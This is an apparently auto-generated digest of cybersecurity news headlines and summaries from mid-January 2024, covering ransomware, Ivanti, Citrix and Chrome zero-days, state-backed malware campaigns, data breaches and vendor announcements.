            Ransomware groups claimed that they successfully targeted 4191 victims in 2023, Cybernews researchers report. According to the Ransomlooker tool, the number of ransomware attack victims increased by 128.17% compared to the previous year (2022), with 1837 additional incidents. Based on Ransomlooker, a free Cybernews tool for monitoring the dark web and other hidden areas of […] "

            Autosummary: Top targeted companies: Stanford University, Volt, CoinBase According to data from Ransomlooker, the top 10 industries targeted by ransomware groups in 2023 were IT services and IT consulting, construction, manufacturing and industrial, retail, hospitals and health care, insurance, law practice, real estate, software development, and machinery manufacturing. "


            U.S. CISA warns of actively exploited Ivanti EPMM flaw CVE-2023-35082

            exploits
            2024-01-19 https://securityaffairs.com/157746/hacking/cisa-ivanti-epmm-actively-exploited.html
            U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Ivanti EPMM flaw CVE-2023-35082 to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the Ivanti EPMM flaw CVE-2023-35082 (CVSS score: 9.8) vulnerability to its Known Exploited Vulnerabilities (KEV) catalog. At the end of July, Ivanti disclosed a security vulnerability impacting Endpoint Manager Mobile (EPMM), tracked […] "

            Autosummary: "


            Payoneer accounts in Argentina hacked in 2FA bypass attacks

            latam
            2024-01-19 https://www.bleepingcomputer.com/news/security/payoneer-accounts-in-argentina-hacked-in-2fa-bypass-attacks/
            Numerous Payoneer users in Argentina report waking up to find that their 2FA-protected accounts were hacked and funds stolen after receiving SMS OTP codes while they were sleeping. [...] "

            Autosummary: Starting last weekend, many Payoneer users in Argentina, whose accounts were protected by two-factor authentication (2FA), reported suddenly losing access to their accounts or simply logging in to empty wallets, losing "years of work" worth in money ranging from $5,000 to $60,000. "


            CISA emergency directive: Mitigate Ivanti zero-days immediately

            exploits
            2024-01-19 https://www.bleepingcomputer.com/news/security/cisa-emergency-directive-mitigate-ivanti-zero-days-immediately/
            CISA issued this year's first emergency directive ordering Federal Civilian Executive Branch (FCEB) agencies to immediately mitigate two Ivanti Connect Secure and Ivanti Policy Secure zero-day flaws in response to widespread and active exploitation by multiple threat actors. [...] "

            Autosummary: Victims discovered so far include government and military departments worldwide, national telecom companies, defense contractors, technology companies, banking, finance, and accounting organizations, worldwide consulting outfits, and aerospace, aviation, and engineering firms. "


            Ivanti EPMM and MobileIron Core vulnerability is actively exploited, CISA confirms (CVE-2023-35082)

            exploits
            2024-01-19 https://www.helpnetsecurity.com/2024/01/19/exploited-cve-2023-35082/

            A previously patched critical vulnerability (CVE-2023-35082) affecting Ivanti Endpoint Manager Mobile (EPMM) and MobileIron Core is being actively exploited, the Cybersecurity and Infrastructure Security Agency (CISA) has confirmed by adding the vulnerability to its Known Exploited Vulnerabilities Catalog (KEV). It is not known whether the vulnerability is being exploited by ransomware groups, and CISA does not publish specific information about attacks in which the vulnerabilities in the KEV catalog are exploited. But it does seem … More

            The post Ivanti EPMM and MobileIron Core vulnerability is actively exploited, CISA confirms (CVE-2023-35082) appeared first on Help Net Security.

            "

            Autosummary: "


            China-linked APT UNC3886 exploits VMware zero-day since 2021

            exploits
            2024-01-19 https://securityaffairs.com/157769/apt/unc3886-exploits-vcenter-server-zero-day-cve-2023-34048.html
            China-linked group UNC3886 has been exploiting vCenter Server zero-day vulnerability CVE-2023-34048 since at least late 2021. Mandiant researchers reported that China-linked APT group UNC3886 has been exploiting vCenter Server zero-day vulnerability CVE-2023-34048 since at least late 2021. vCenter Server is a critical component in VMware virtualization and cloud computing software suite. It serves as a […] "

            Autosummary: China-linked APT UNC3886 exploits VMware zero-day since 2021. Pierluigi Paganini, January 19, 2024. China-linked group UNC3886 has been exploiting vCenter Server zero-day vulnerability CVE-2023-34048 since at least late 2021. "


            VF Corp December data breach impacts 35 million customers

            financial
            2024-01-19 https://securityaffairs.com/157786/data-breach/vf-corp-december-data-breach.html
            American global apparel and footwear company VF Corp revealed that the December data breach impacted 35.5 million customers. VF Corporation is an American global apparel and footwear company that owns 13 brands. In 2015, the company controlled 55% of the U.S. backpack market with the JanSport, Dickies, Eastpak, Timberland, Smartwool, Vans, and The North Face brands. In December 2023, VF […] "

            Autosummary: “However, VF does not collect or retain in its IT systems any consumer social security numbers, bank account information or payment card information as part of its direct-to-consumer practices, and, while the investigation remains ongoing, VF has not detected any evidence to date that any consumer passwords were acquired by the threat actor.” "


            The power of AI in cybersecurity

            ciber
            2024-01-18 https://www.helpnetsecurity.com/2024/01/18/cybersecurity-ai/

            The widespread adoption of artificial intelligence (AI), particularly generative AI (GenAI), has revolutionized organizational landscapes and transformed both the cyber threat landscape and cybersecurity. AI as a powerful cybersecurity tool As organizations handle increasing amounts of data daily, AI offers advanced capabilities that would be harder to achieve with traditional methods. According to the “best practices” report recently published by Spain’s National Cryptology Centre (NCC), when applied to cybersecurity, AI can: Advance threat detection and … More

            The post The power of AI in cybersecurity appeared first on Help Net Security.

            "

            Autosummary: "


            Adversaries exploit trends, target popular GenAI apps

            exploits
            2024-01-18 https://www.helpnetsecurity.com/2024/01/18/growing-ai-app-usage/

            More than 10% of enterprise employees access at least one generative AI application every month, compared to just 2% a year ago, according to Netskope. In 2023, ChatGPT was the most popular generative AI application, accounting for 7% of enterprise usage. While Netskope expects the total number of users accessing AI apps in the enterprise to continue rising moderately next year, there is an emerging population of power users who are steadily growing their use … More

            The post Adversaries exploit trends, target popular GenAI apps appeared first on Help Net Security.

            "

            Autosummary: “With growing AI app usage, employees are more likely to expose sensitive data like credentials, personal information, or intellectual property,” said Ray Canzanese, Threat Research Director, Netskope Threat Labs. "


            Ransomware negotiation: When cybersecurity meets crisis management

            exploits ciber
            2024-01-18 https://www.helpnetsecurity.com/2024/01/18/tim-morris-tanium-ransomware-negotiation/

            In this Help Net Security interview, Tim Morris, Chief Security Advisor at Tanium, discusses ransomware negotiation, how it typically unfolds, and how organizations should have a playbook that clearly outlines what to do, when to do it, who is notified, who will inform the board, who will talk to the press, etc. Additionally, he discusses ransomware gangs, the role of cyber insurance, and how governments and regulatory bodies are responding to the ransomware threat. In … More

            The post Ransomware negotiation: When cybersecurity meets crisis management appeared first on Help Net Security.

            "

            Autosummary: In this Help Net Security interview, Tim Morris, Chief Security Advisor at Tanium, discusses ransomware negotiation, how it typically unfolds, and how organizations should have a playbook that clearly outlines what to do, when to do it, who is notified, who will inform the board, who will talk to the press, etc. Additionally, he discusses ransomware gangs, the role of cyber insurance, and how governments and regulatory bodies are responding to the ransomware threat. In light of the increasing sophistication of ransomware attacks, can you discuss the dynamics of negotiating with ransomware gangs? "


            Update Chrome! Google patches actively exploited zero-day vulnerability

            exploits
            2024-01-18 https://www.malwarebytes.com/blog/news/2024/01/update-chrome-google-patches-actively-exploited-zero-day-vulnerability
            Google has issued a security update for the Chrome browser that includes a patch for one zero-day vulnerability. "

            Autosummary: After the update, the version should be 120.0.6099.224, or later. Technical details: Google never gives out a lot of information about vulnerabilities, for obvious reasons. The following toggle settings are available: Toggle Off (Default): Feature is turned off. Toggle On – Balanced (Recommended): Microsoft Edge will apply added security protections when users visit unfamiliar sites but bypass those protections for commonly visited sites. "


            Swimlane enhances Turbine platform to alleviate the pressure on SecOps teams

            industry
            2024-01-18 https://www.helpnetsecurity.com/2024/01/18/swimlane-turbine-platform/

            Swimlane announced its new Turbine innovations, Canvas and Hero AI. This transformative combination empowers security teams to build automation in seconds with limitless integration possibilities, leading to dramatic time and resource savings. SecOps teams are drowning in a sea of alerts and evolving threats while facing a chronic shortage of qualified staff. This critical gap leaves organizations dangerously exposed as adversaries evolve their tactics and accelerate their attacks. Recognizing this urgent need, Swimlane has revolutionized … More

            The post Swimlane enhances Turbine platform to alleviate the pressure on SecOps teams appeared first on Help Net Security.

            "

            Autosummary: Text-to-Code ChatBot: Low-code solutions allow analysts to build use cases in a no-code fashion, but for power users and real-time security operations, a snippet of code might be urgently needed. Everyone needs a hero: Bringing together humans, automation, and AI to elevate security operations. Hero AI, Swimlane’s collection of AI-enabled innovations, enhances the automation solutions available for the Swimlane Turbine platform. Recognizing this urgent need, Swimlane has revolutionized its Turbine low-code automation platform with advancements that strengthen security teams by connecting them, their telemetry, and technology through a human-centric AI and automation building experience. "


            Credentials are Still King: Leaked Credentials, Data Breaches and Dark Web Markets

            financial
            2024-01-18 https://www.bleepingcomputer.com/news/security/credentials-are-still-king-leaked-credentials-data-breaches-and-dark-web-markets/
            Learn how threat actors utilize credentials to break into privileged IT infrastructure to create data breaches and distribute ransomware. [...] "

            Autosummary: Screenshot of the information that stealer logs can contain, including cookies, passwords, and other sensitive information (Source: Flare). Tier 3 Leaked Credentials: this tier of leaks is also from stealer logs, but poses extreme risk to the organization. Screenshot of a combolist (Source: Flare). These credentials usually come from previously known breaches, or stealer logs, or are sometimes totally made up; the original source is never totally clear, but the sheer number of credentials one can acquire through combolists, combined with frequent password reuse on the user’s part, still makes them a considerable attack vector. Tier 1 Leaked Credentials: Tier 1 leaked credentials result from a third-party application/service breach, with all of the users of that service having their passwords compromised and distributed in a data dump on the dark web. "


            Google: Russian FSB hackers deploy new Spica backdoor malware

            exploits rusia-ucrania
            2024-01-18 https://www.bleepingcomputer.com/news/security/google-russian-fsb-hackers-deploy-new-spica-backdoor-malware/
            Google says the ColdRiver Russian-backed hacking group is pushing previously unknown backdoor malware using payloads masquerading as a PDF decryption tool. [...] "

            Autosummary: PDF lure document (Google TAG). The Spica Rust-based malware uses JSON over websockets to communicate with its command-and-control (C2) server, and it helps to run arbitrary shell commands, steal Chrome, Firefox, Opera, and Edge cookies, upload and download files, and exfiltrate documents. "


            Poorly secured PostgreSQL, MySQL servers targeted by ransomware bot

            exploits ransomware
            2024-01-18 https://www.helpnetsecurity.com/2024/01/18/postgresql-mysql-ransomware-bot/

            Users exposing poorly secured PostgreSQL and MySQL servers online are in danger of getting their databases wiped by a ransomware bot, Border0 researchers are warning. The attackers ask for a small sum to return / not publish the data, but those who pay will not get their data back, as the bot takes only a small amount of it before wiping it all. How the ransomware bot operates: Spurred by a recent tweet in which … More

            The post Poorly secured PostgreSQL, MySQL servers targeted by ransomware bot appeared first on Help Net Security.

            "

            Autosummary: Created a new database named readme_to_recover, which contains the ransom note. The ransom note (Source: Border0): “If you decide not to retrieve the data, we may sell your database in online markets, disclose it to your users and request payment from them, disclose it in online breach forums, or delete it. "


            ESET launches MDR service to improve cybersecurity for SMBs

            ciber
            2024-01-18 https://www.helpnetsecurity.com/2024/01/18/eset-mdr/

            ESET launched ESET MDR, an innovative solution aimed at addressing the evolving cybersecurity challenges faced by SMBs. This launch marks a significant stride in expanding ESET’s security services portfolio with another MDR solution. In a rapidly changing threat landscape, organizations seek MDR service providers to enhance their security postures, reduce false positives and fortify their threat detection, investigation, and response capabilities. The ESET MDR service for SMBs is designed specifically to meet these needs and … More

            The post ESET launches MDR service to improve cybersecurity for SMBs appeared first on Help Net Security.

            "

            Autosummary: In a rapidly changing threat landscape, organizations seek MDR service providers to enhance their security postures, reduce false positives and fortify their threat detection, investigation, and response capabilities. "


            Russian COLDRIVER Hackers Expand Beyond Phishing with Custom Malware

            financial exploits rusia-ucrania
            2024-01-18 https://thehackernews.com/2024/01/russian-coldriver-hackers-expand-beyond.html
            The Russia-linked threat actor known as COLDRIVER has been observed evolving its tradecraft to go beyond credential harvesting to deliver its first-ever custom malware written in the Rust programming language. Google's Threat Analysis Group (TAG), which shared details of the latest activity, said the attack chains leverage PDFs as decoy documents to trigger the infection sequence. The lures are "

            Autosummary: COLDRIVER, also known by the names Blue Callisto, BlueCharlie (or TAG-53), Calisto (alternately spelled Callisto), Gossamer Bear, Star Blizzard (formerly SEABORGIUM), TA446, and UNC4057, is known to be active since 2019, targeting a wide range of sectors. "


            Google TAG warns that Russian COLDRIVER APT is using a custom backdoor

            rusia-ucrania
            2024-01-18 https://securityaffairs.com/157705/apt/google-warns-coldriver-malware.html
            Google warns that the Russia-linked threat actor COLDRIVER expands its targeting and is developing a custom malware. The ColdRiver APT (aka “Seaborgium“, “Callisto”, “Star Blizzard”, “TA446”) is a Russian cyberespionage group that has been targeting government officials, military personnel, journalists and think tanks since at least 2015. In the past, the group’s activity involved persistent phishing […] "

            Autosummary: Spica supports multiple capabilities, such as: executing arbitrary shell commands; stealing cookies from Chrome, Firefox, Opera and Edge; uploading and downloading files; perusing the filesystem by listing its contents; enumerating documents and exfiltrating them in an archive. There is also a command called “telegram,” but the functionality of this command is unclear. The malware maintains persistence via an obfuscated PowerShell command that creates a scheduled task named CalendarChecker. "


            CISA: Critical Ivanti auth bypass bug now actively exploited

            exploits
            2024-01-18 https://www.bleepingcomputer.com/news/security/cisa-critical-ivanti-auth-bypass-bug-now-actively-exploited/
            CISA warns that a critical authentication bypass vulnerability in Ivanti's Endpoint Manager Mobile (EPMM) and MobileIron Core device management software (patched in August 2023) is now under active exploitation. [...] "

            Autosummary: Multiple other Ivanti zero-days (i.e., CVE-2021-22893, CVE-2023-35078, CVE-2023-35081, CVE-2023-38035) have been exploited in recent years to breach dozens of government, defense, and financial organizations across the United States and Europe, several Norwegian government organizations, as well as in targeted attacks. "


            Kansas State University cyberattack disrupts IT network and services

            government ciber
            2024-01-18 https://www.bleepingcomputer.com/news/security/kansas-state-university-cyberattack-disrupts-it-network-and-services/
            Kansas State University (K-State) announced it is managing a cybersecurity incident that has disrupted certain network systems, including VPN, K-State Today emails, and video services on Canvas and Mediasite. [...] "

            Autosummary: Impacted systems were taken offline upon detection of the attack, resulting in the unavailability of VPN, emails, Canvas and Mediasite videos, printing, shared drives, and mailing list management services (Listservs). "


            Cybersecurity spend to soar in 2024: How companies can maximize their investment

            ciber
            2024-01-18 https://www.malwarebytes.com/blog/business/2024/01/cybersecurity-spend-to-soar-in-2024-how-companies-can-maximize-their-investment
            "Spend smarter, not harder" is the mantra for cybersecurity in 2024. "

            Autosummary: Every additional security tool a company buys requires its own set of configurations, updates, and management protocols, ultimately translating to longer response times, inefficient workflows, and an inability to have a unified view of the threat landscape. That’s good, but for $5, you can upgrade to a complete meal—burger, fries, drink, maybe even a vintage Furby. "


            New Docker Malware Steals CPU for Crypto & Drives Fake Website Traffic

            exploits
            2024-01-18 https://thehackernews.com/2024/01/new-docker-malware-steals-cpu-for.html
            Vulnerable Docker services are being targeted by a novel campaign in which the threat actors are deploying XMRig cryptocurrency miner as well as the 9Hits Viewer software as part of a multi-pronged monetization strategy. "This is the first documented case of malware deploying the 9Hits application as a payload," cloud security firm Cado said, adding the development is a sign that adversaries are "

            Autosummary: "


            CISA adds Chrome and Citrix NetScaler to its Known Exploited Vulnerabilities catalog

            exploits
            2024-01-18 https://securityaffairs.com/157717/hacking/chrome-citrix-bugs-known-exploited-vulnerabilities-catalog.html
            U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Chrome and Citrix flaws to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the following vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog. This week Citrix warned customers to install security updates to address two actively exploited zero-day vulnerabilities, tracked as CVE-2023-6548 and CVE-2023-6549, […] "

            Autosummary: This week Citrix warned customers to install security updates to address two actively exploited zero-day vulnerabilities, tracked as CVE-2023-6548 and CVE-2023-6549, impacting Netscaler ADC and Gateway appliances. CISA adds Chrome and Citrix NetScaler to its Known Exploited Vulnerabilities catalog. Pierluigi Paganini, January 18, 2024. U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Chrome and Citrix flaws to its Known Exploited Vulnerabilities catalog. "


            TeamViewer abused to breach networks in new ransomware attacks

            exploits ransomware
            2024-01-18 https://www.bleepingcomputer.com/news/security/teamviewer-abused-to-breach-networks-in-new-ransomware-attacks/
            Ransomware actors are again using TeamViewer to gain initial access to organization endpoints and attempt to deploy encryptors based on the leaked LockBit ransomware builder. [...] "

            Autosummary: In the second endpoint seen by Huntress, which has been running since 2018, there had been no activity in the logs for the past three months, indicating that it was less frequently monitored, possibly making it more attractive for the attackers. "


            Virtual kidnapping: How to see through this terrifying scam

            financial
            2024-01-18 https://www.welivesecurity.com/en/scams/virtual-kidnapping-see-through-scam/
            Phone fraud takes a frightening twist as fraudsters can tap into AI to cause serious emotional and financial damage to the victims "

            Autosummary: What the future holds for voice cloning: Unfortunately, voice cloning technology is already worryingly convincing, as our recent experiment also proves. Instead, it’s a terrifying example of the lengths that scammers can now go to in order to extort money from their victims, co-opting new technology for nefarious purposes. If you fall for the scam, you will most likely be asked to pay in a non-traceable way, like cryptocurrency. In fact, besides disinformation, deepfake technology is also being used for business email compromise (as tested by our own Jake Moore) and sextortion. We are only at the start of a long journey. "


            Zero-Day Alert: Update Chrome Now to Fix New Actively Exploited Vulnerability

            exploits
            2024-01-17 https://thehackernews.com/2024/01/zero-day-alert-update-chrome-now-to-fix.html
            Google on Tuesday released updates to fix four security issues in its Chrome browser, including an actively exploited zero-day flaw. The issue, tracked as CVE-2024-0519, concerns an out-of-bounds memory access in the V8 JavaScript and WebAssembly engine, which can be weaponized by threat actors to trigger a crash. "By reading out-of-bounds memory, an attacker might be able to get secret values, "

            Autosummary: "


            Griselda: Colombian drug lord "Cocaine Godmother" gets Hollywood makeover

            latam
            2024-01-17 https://www.bbc.co.uk/news/entertainment-arts-67921672?at_medium=RSS&at_campaign=KARANGA
            The ruthless criminal mastermind ran one of the most profitable cartels in history in 1980s Miami. "

            Autosummary: "


            The right strategy for effective cybersecurity awareness

            ciber
            2024-01-17 https://www.helpnetsecurity.com/2024/01/17/employees-cybersecurity-awareness-training/

            Employees play a significant role in safeguarding organizational assets. With a constantly evolving threat landscape, cybersecurity awareness training is an essential component in creating a good security culture. Why cybersecurity awareness training? 81% of organizations were hit by malware, phishing, and password attacks in 2022, mostly targeting users. But even though employees go through cybersecurity awareness training, half of organizations’ leaders believe their employees still lack cybersecurity knowledge. This might be due to ineffective and … More

            The post The right strategy for effective cybersecurity awareness appeared first on Help Net Security.

            "

            Autosummary: The European Union Agency for Cybersecurity (ENISA) has outlined the following essential objectives of an organization’s cyber awareness program: raising cybersecurity awareness; promoting cybersecurity education and culture; being prepared for incidents; boosting comprehension of cybersecurity threats and landscape; improving cybersecurity culture and hygiene; testing policies and procedures. Ensuring effective cybersecurity awareness training: First of all, employees must be educated about the various threats they may encounter when in their work environment. "


            GitHub Rotates Keys After High-Severity Vulnerability Exposes Credentials

            exploits
            2024-01-17 https://thehackernews.com/2024/01/github-rotates-keys-after-high-severity.html
            GitHub has revealed that it has rotated some keys in response to a security vulnerability that could be potentially exploited to gain access to credentials within a production container. The Microsoft-owned subsidiary said it was made aware of the problem on December 26, 2023, and that it addressed the issue the same day, in addition to rotating all potentially exposed credentials out of an "

            Autosummary: "


            Ivanti vulnerabilities now actively exploited in massive numbers

            exploits
            2024-01-17 https://www.malwarebytes.com/blog/news/2024/01/ivanti-vulnerabilities-now-actively-exploited-in-massive-numbers
            Two vulnerabilities in Ivanti Connect Secure and Ivanti Policy Secure Gateways are subject to massive exploitation despite an available workaround. "

            Autosummary: Use the Browse button to point to the unzipped XML file. Click the Import button. Importing this XML into any one node of a Cluster is enough. "


            AI used to fake voices of loved ones in “I’ve been in an accident” scam

            financial
            2024-01-17 https://www.malwarebytes.com/blog/news/2024/01/ai-used-to-fake-voices-of-loved-ones-in-ive-been-in-an-accident-scams
            AI is being used by shock call spammers to emulate the voice of a loved one claiming to be involved in an accident. "

            Autosummary: In earlier days of scams like these, success depended a great deal on the criminal’s skills at social engineering, but rapid advancements in Artificial Intelligence (AI) mean scammers can now easily and convincingly fake the “voice” of the relative that is the supposed victim of the accident. "


            Industrial Defender collaborates with Dragos to enhance outcomes for OT operators

            industry
            2024-01-17 https://www.helpnetsecurity.com/2024/01/17/industrial-defender-dragos-partnership/

            Industrial Defender announced a strategic technology partnership with Dragos. The collaboration between these leaders in OT cybersecurity integrates their respective platform capabilities, representing a major move towards combining their leading strengths to enhance outcomes for OT operators. The partnership is centered around the shared goal of enhancing the security and resilience of critical infrastructure and manufacturing facilities. The intent of this collaboration is to bring together the unique strengths of both Industrial Defender and Dragos. … More

            The post Industrial Defender collaborates with Dragos to enhance outcomes for OT operators appeared first on Help Net Security.

            "

            Autosummary: “Industrial Defender’s longstanding expertise in ICS/OT security is well-recognized in operational environments,” said Matt Cowell, Global VP of Business Development, Dragos. "


            Google fixes actively exploited Chrome zero-day (CVE-2024-0519)

            exploits
            2024-01-17 https://www.helpnetsecurity.com/2024/01/17/cve-2024-0519/

            In the new stable release of the Chrome browser, Google has fixed three security vulnerabilities affecting the V8 engine, including one zero-day (CVE-2024-0519) with an existing exploit. About CVE-2024-0519: V8 is an open-source JavaScript and WebAssembly engine developed by the Chromium Project for Chromium and Google Chrome web browsers. CVE-2024-0519 is an (obviously exploitable) out-of-bounds memory access that, as noted by NIST, “allowed a remote attacker to potentially exploit heap corruption via a … More

            The post Google fixes actively exploited Chrome zero-day (CVE-2024-0519) appeared first on Help Net Security.

            "

            Autosummary: "


            Citrix warns admins to immediately patch NetScaler for actively exploited zero-days

            exploits
            2024-01-17 https://securityaffairs.com/157611/hacking/citrix-netscaler-zero-days.html
            Citrix fixed two actively exploited zero-day vulnerabilities impacting Netscaler ADC and Gateway appliances. Citrix warns customers to install security updates to address two actively exploited zero-day vulnerabilities, tracked as CVE-2023-6548 and CVE-2023-6549, impacting Netscaler ADC and Gateway appliances. “Exploits of these CVEs on unmitigated appliances have been observed. Cloud Software Group strongly urges affected customers […] "

            Autosummary: Below is the list of Netscaler product versions:
            NetScaler ADC and NetScaler Gateway 14.1-12.35 and later releases
            NetScaler ADC and NetScaler Gateway 13.1-51.15 and later releases of 13.1
            NetScaler ADC and NetScaler Gateway 13.0-92.21 and later releases of 13.0
            NetScaler ADC 13.1-FIPS 13.1-37.176 and later releases of 13.1-FIPS
            NetScaler ADC 12.1-FIPS 12.1-55.302 and later releases of 12.1-FIPS
            NetScaler ADC 12.1-NDcPP 12.1-55.302 and later releases of 12.1-NDcPP
            Citrix vulnerabilities were already exploited in the past in large-scale attacks. "


            ALI Technologies: Hoverbike start-up files for bankruptcy

            financial
            2024-01-17 https://www.bbc.co.uk/news/technology-67946088?at_medium=RSS&at_campaign=KARANGA
            Japanese firm ALI Technologies had dreamed of a "new form of movement". "

            Autosummary: "


            Wazuh: Building robust cybersecurity architecture with open source tools

            ciber
            2024-01-17 https://www.bleepingcomputer.com/news/security/wazuh-building-robust-cybersecurity-architecture-with-open-source-tools/
            Open source solutions allow organizations to customize and adapt their cybersecurity infrastructure to their specific needs. Learn more from @wazuh on building open source cybersecurity infrastructure. [...] "

            Autosummary: By providing a platform for security information and event management, log analysis, intrusion detection, vulnerability detection, active response, file integrity monitoring, compliance monitoring, and more. For example, an anti-virus solution for endpoint security, web application firewall for application security, network firewall for network security, and SIEM solution for monitoring and compliance. Leveraging open source tools and solutions to build a cybersecurity architecture offers organizations several advantages, such as cost-effectiveness, flexibility, community support, and transparency. Some key areas to consider when implementing a security architecture include: endpoint protection, cloud security, network security, application security, identity and access management, monitoring and compliance, vulnerability management, and physical security. Wazuh provides out-of-the-box support for compliance frameworks like PCI DSS, HIPAA, GDPR, NIST SP 800-53, and TSC. "


            Github rotated credentials after the discovery of a vulnerability

            exploits
            2024-01-17 https://securityaffairs.com/157640/security/github-rotated-some-credentials.html
            GitHub rotated some credentials after the discovery of a flaw that allowed access to the environment variables of a production container. After GitHub became aware of a vulnerability through its bug bounty program, the Microsoft-owned company rotated some credentials. The vulnerability, tracked as CVE-2024-0200 (CVSS score 7.2), allowed access to the environment variables of a production container […] "

            Autosummary: “On December 26, 2023, GitHub received a report through our Bug Bounty Program demonstrating a vulnerability which, if exploited, allowed access to credentials within a production container.” reads the announcement. "


            FBI, CISA warn of AndroxGh0st botnet for victim identification and exploitation

            exploits
            2024-01-17 https://securityaffairs.com/157622/cyber-crime/androxgh0st-botnet-alert.html
            U.S. CISA and the FBI warned of AndroxGh0st malware used to create a botnet for victim identification and exploitation in target networks. US CISA and the Federal Bureau of Investigation (FBI) released a joint Cybersecurity Advisory (CSA) to warn of AndroxGh0st malware. The malware is spreading to create a botnet for victim identification and exploitation in target networks. […] "

            Autosummary: "


            Microsoft: Iranian hackers target researchers with new MediaPl malware

            exploits
            2024-01-17 https://www.bleepingcomputer.com/news/security/microsoft-iranian-hackers-target-researchers-with-new-mediapl-malware/
            Microsoft says that a group of Iranian-backed state hackers are targeting high-profile employees of research organizations and universities across Europe and the United States in spearphishing attacks pushing new backdoor malware. [...] "

            Autosummary: Between March 2021 and June 2022, APT35 backdoored at least 34 companies with previously unknown Sponsor malware in a campaign that targeted government and healthcare organizations, as well as firms in the financial services, engineering, manufacturing, technology, law, telecommunications, and other industry sectors. "


            Bigpanzi botnet infects 170,000 Android TV boxes with malware

            exploits
            2024-01-17 https://www.bleepingcomputer.com/news/security/bigpanzi-botnet-infects-170-000-android-tv-boxes-with-malware/
            A previously unknown cybercrime syndicate named "Bigpanzi" has been making significant money by infecting Android TV and eCos set-top boxes worldwide since at least 2015. [...] "

            Autosummary: Bigpanzi infects the devices via firmware updates or backdoored apps the users are tricked into installing themselves, as highlighted in a September 2023 report by Dr. Web. (Figure: Malicious apps carrying malware payloads. Source: Xlabs.) The cybercriminals monetize these infections by turning the devices into nodes for illegal media streaming platforms, traffic proxying networks, distributed denial of service (DDoS) swarms, and OTT content provision. "


            Ivanti Connect Secure zero-days now under mass exploitation

            exploits
            2024-01-16 https://www.bleepingcomputer.com/news/security/ivanti-connect-secure-zero-days-now-under-mass-exploitation/
            Two zero-day vulnerabilities affecting Ivanti’s Connect Secure VPN and Policy Secure network access control (NAC) appliances are now under mass exploitation. [...] "

            Autosummary: The list of tools used in the attacks includes:
            - Zipline Passive Backdoor: custom malware that can intercept network traffic, supports upload/download operations, creates reverse shells, proxy servers, server tunneling
            - Thinspool Dropper: custom shell script dropper that writes the Lightwire web shell onto Ivanti CS, securing persistence
            - Wirefire web shell: custom Python-based web shell supporting unauthenticated arbitrary command execution and payload dropping
            - Lightwire web shell: custom Perl web shell embedded in a legitimate file, enabling arbitrary command execution
            - Warpwire harvester: custom JavaScript-based tool for harvesting credentials at login, sending them to a command and control (C2) server
            - PySoxy tunneler: facilitates network traffic tunneling for stealthiness
            - BusyBox: multi-call binary combining many Unix utilities used in various system tasks
            - Thinspool utility (sessionserver.pl): used to remount the filesystem as "read/write" to enable malware deployment
            The most notable is ZIPLINE, a passive backdoor that intercepts incoming network traffic and provides file transfer, reverse shell, tunneling, and proxying capabilities. "


            10 cybersecurity frameworks you need to know about

            ciber
            2024-01-16 https://www.helpnetsecurity.com/2024/01/16/cybersecurity-frameworks/

            As cyber threats grow more sophisticated, understanding and implementing robust cybersecurity frameworks is crucial for organizations of all sizes. This article lists the most essential cybersecurity frameworks developed to guide businesses and governments in safeguarding their digital assets. From the comprehensive guidelines of the NIST Cybersecurity Framework to the ISO/IEC 27001 information security management standard, these frameworks provide a structured and strategic approach to managing cybersecurity risks. CIS Critical Security Controls The CIS Critical Security … More

            The post 10 cybersecurity frameworks you need to know about appeared first on Help Net Security.

            "

            Autosummary: Secure Controls Framework (SCF) The Secure Controls Framework (SCF) centers on internal controls, encompassing cybersecurity and data privacy-related policies, standards, procedures, technologies, and their related processes. CIS Critical Security Controls The CIS Critical Security Controls (CIS Controls) offer a straightforward, prioritized, and prescriptive collection of best practices for enhancing cybersecurity posture. "


            Tsurugi Linux: Tailoring user experience for digital forensics and OSINT investigations

            industry Linux
            2024-01-16 https://www.helpnetsecurity.com/2024/01/16/tsurugi-linux-open-source-dfir-analysis/

            Tsurugi Linux is a heavily customized open-source distribution focused on supporting DFIR investigations. The project focuses mainly on live forensics analysis, post-mortem analysis, and digital evidence acquisition. Users can also perform malware analysis, OSINT and computer vision activities. “We’ve crafted a user-friendly experience, organizing the main menu in a logical forensic analysis sequence. Our menu is your roadmap from device acquisition to integrity checks, artifact extraction, and reporting tools. It’s not just about familiarity; it’s … More

            The post Tsurugi Linux: Tailoring user experience for digital forensics and OSINT investigations appeared first on Help Net Security.

            "

            Autosummary: And for the seasoned experts, every tool is at your fingertips, ready to be wielded precisely through the command line console,” Giovanni Rattaro, Tsurugi Linux core developer, told Help Net Security. "


            Experts warn of a vulnerability affecting Bosch BCC100 Thermostat

            exploits
            2024-01-16 https://securityaffairs.com/157537/security/bosch-bcc100-thermostats-flaw.html
            Researchers from Bitdefender discovered a high-severity vulnerability affecting Bosch BCC100 thermostats. The flaw, tracked as CVE-2023-49722 (CVSS score: 8.3), can be exploited by an attacker on the same network to replace the device firmware with a rogue version. The vulnerability was reported […] "

            Autosummary: The flaw affects the following products:
            - Bosch BCC101, CVE-2023-49722, version(s): 4.13.20 up to (excluding) 4.13.33
            - Bosch BCC102, CVE-2023-49722, version(s): 4.13.20 up to (excluding) 4.13.33
            - Bosch BCC50, CVE-2023-49722, version(s): 4.13.20 up to (excluding) 4.13.33
            The vendor addressed the flaw with the release of WiFi firmware 4.13.33, which closes port 8899. "


            Alleged FruitFly malware creator ruled incompetent to stand trial

            exploits
            2024-01-16 https://www.malwarebytes.com/blog/news/2024/01/fruitfly-malware-creator-ruled-incompetent-to-stand-trial
            Almost seven years after alleged FruitFly author Phillip Durachinsky’s arrest, judge Solomon Oliver has ruled he’s incompetent to stand trial. "

